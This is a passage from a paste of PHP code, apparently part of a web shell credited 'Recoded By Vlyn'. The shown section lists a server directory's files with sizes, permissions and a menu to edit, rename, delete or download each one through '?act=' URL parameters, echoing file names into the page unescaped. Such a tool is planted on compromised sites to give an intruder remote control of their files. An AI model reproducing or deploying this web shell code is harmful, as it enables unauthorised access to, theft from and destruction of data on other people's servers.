  4217. $size = filesize("$dir/$file")/1024;
  4218. $size = round($size,3);
  4219. if($size > 1024) {
  4220. $size = round($size/1024,2). 'MB';
  4221. } else {
  4222. $size = $size. 'KB';
  4223. }
  4224. if(!is_file("$dir/$file")) continue;
  4225. echo "<tr>";
  4226. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4227. echo "<td class='td_home'><center>$ftype</center></td>";
  4228. echo "<td class='td_home'><center>$size</center></td>";
  4229. echo "<td class='td_home'><center>$ftime</center></td>";
  4230. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4231. echo "<td class='td_home' style='padding-left: 15px;'><from><select onchange='if (this.value) window.open(this.value);'><option selected='selected' value=''> Select </option><option value='?act=edit&dir=$dir&file=$dir/$file'>edit</option><option value='?act=rename&dir=$dir&file=$dir/$file'>rename</option><option value='?act=delete&dir=$dir&file=$dir/$file'>delete</option><option value='?act=download&dir=$dir&file=$dir/$file'>download</option></td>";
  4232. }
  4233. echo "</tr></table>";
  4234. } else {
  4235. echo "<font color=red>can't open directory</font>";
  4236. }
  4237. }
  4238. echo "<hr color=blue><center>Copyright &copy; ".date("Y")." - <a href='' target='_blank'><font color=blue></font></a>Recoded By <a href='https://www.facebook.com/Vlyn01' target='_BLANK'><font color=blue>Vlyn</a></font></center>";
Add Comment
Please, Sign In to add comment